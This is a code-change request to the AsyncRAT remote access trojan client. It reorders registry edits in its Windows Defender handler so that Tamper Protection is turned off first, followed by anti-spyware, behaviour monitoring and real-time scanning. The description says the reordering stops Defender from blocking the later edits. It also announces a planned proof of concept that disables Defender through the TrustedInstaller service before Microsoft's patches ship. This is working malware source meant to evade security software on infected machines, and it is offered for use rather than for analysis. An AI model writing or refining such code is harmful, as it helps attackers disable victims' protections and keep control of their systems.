### PR TITLE
Fixed potential error in MS-AntiTamper Protection Framework

### DIFF
--- a/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs
@@ -16,12 +16,12 @@ namespace Client.Handle_Packet
         public HandleWindowsDefender()
         {
             if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
-
+            
+            RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6
             RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1");
             RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1");
             RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1");
             RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
-            RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6
 
             CheckDefender();
         }


### PR DESCRIPTION
Anti-Tamper protection should be disabled first as to prevent the first changes from being blocked due to tamper protection blocking them prior to being disabled (Working on a POC that bypass's the need to access's the registry and interacts directly with the Service as trusted installer, should be done before the new MS security patch's hit the Commercial Release Channel)